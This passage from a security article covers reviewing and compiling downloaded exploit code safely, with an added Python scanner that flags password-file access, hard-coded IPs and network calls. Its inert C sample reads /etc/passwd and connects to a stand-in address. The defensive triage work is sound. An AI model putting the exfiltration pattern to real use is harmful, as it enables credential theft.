Open up the script code file and review the runtime instructions located in the top comments. Reviewing the code also allows you to ensure that no secret Trojans or malware are lurking inside. I've seen exploit code which did nothing but steal the current user’s password file and send it to a remote IP address. If you can’t analyze the code adequately beforehand, run it in a virtual environment or don’t run it at all.
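A first-pass triage for the review described above, as an added example (not code from the original article): it lists the lines of a downloaded source file that touch password files, hard-coded addresses, network calls, shell execution or encoded blobs, so a reviewer knows where to read first. The rule set, the function names and the `SAMPLE` text are assumptions constructed for illustration, and an empty result does not show the code is safe.

```python
import ipaddress
import re

# Heuristic rules (assumptions for this example, not an exhaustive list).
RULES = {
    "credential-file": re.compile(r"/etc/(?:passwd|shadow)|\.ssh/"),
    "hardcoded-ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "network-call": re.compile(r"\b(?:socket|connect|sendto|send|urlopen)\s*\(|\b(?:curl|wget)\s"),
    "shell-exec": re.compile(r"\b(?:system|popen|exec[lv]p?e?)\s*\("),
    "encoded-blob": re.compile(r"(?:\\x[0-9a-fA-F]{2}){16,}|[A-Za-z0-9+/]{80,}={0,2}"),
}

def _remote_ip(text):
    """True for a valid address that is neither loopback nor 0.0.0.0."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:  # dotted number with an octet above 255, e.g. 300.1.1.1
        return False
    return not (ip.is_loopback or ip.is_unspecified)

def scan_source(source):
    """Return (line_no, rule, matched_text) for every suspicious token."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for rule, rx in RULES.items():
            for m in rx.finditer(line):
                hit = m.group().strip()
                if rule == "hardcoded-ip" and not _remote_ip(hit):
                    continue
                findings.append((no, rule, hit))
    return findings

def looks_like_exfil(findings):
    """Password-file access plus any outbound-network indicator in one file."""
    rules = {rule for _, rule, _ in findings}
    return "credential-file" in rules and bool(rules & {"hardcoded-ip", "network-call"})

# Constructed, inert fragment; 203.0.113.7 is a documentation-range address.
SAMPLE = '''\
/* usage: ./poc <target> */
int main(int argc, char **argv) {
    FILE *f = fopen("/etc/passwd", "r");
    int s = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr("203.0.113.7");
    connect(s, (struct sockaddr *)&addr, sizeof addr);
    return run_check(argv[1]);   /* the advertised functionality */
}
'''

if __name__ == "__main__":
    for no, rule, hit in scan_source(SAMPLE):
        print(f"line {no}: {rule}: {hit}")
    print("read closely before running:", looks_like_exfil(scan_source(SAMPLE)))
```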
Other types of exploits must be compiled into an executable before testing. Some malware samples can be compiled by almost any related language compiler, but others must be created by a particular compiler (and will say so in the starting comments). For instance, C programs often can be compiled into executable form using any C compiler. In the Linux world, I often use GNU’s C compiler, gcc, by typing something like this:
gcc -o outputfilename inputfilename.c
The -o indicates the following text will be the output file name of the executable.
Sometimes a compiler will need additional support files and libraries. The exploit code author or their code comments will usually indicate this; if not, troubleshoot your compiler’s errors and try again.
If you’re not one to compile code, download precompiled exploit code. Without reviewing the source code yourself and compiling it by hand, however, you’ll never know if it contains other malicious commands or bugs. Exploit code authors often disable their exploit code slightly to discourage script kiddies from running it so easily. By requiring some investigative work on the part of the eventual user, they figure the increased level of expertise needed will dissuade overexuberant hacker wannabes.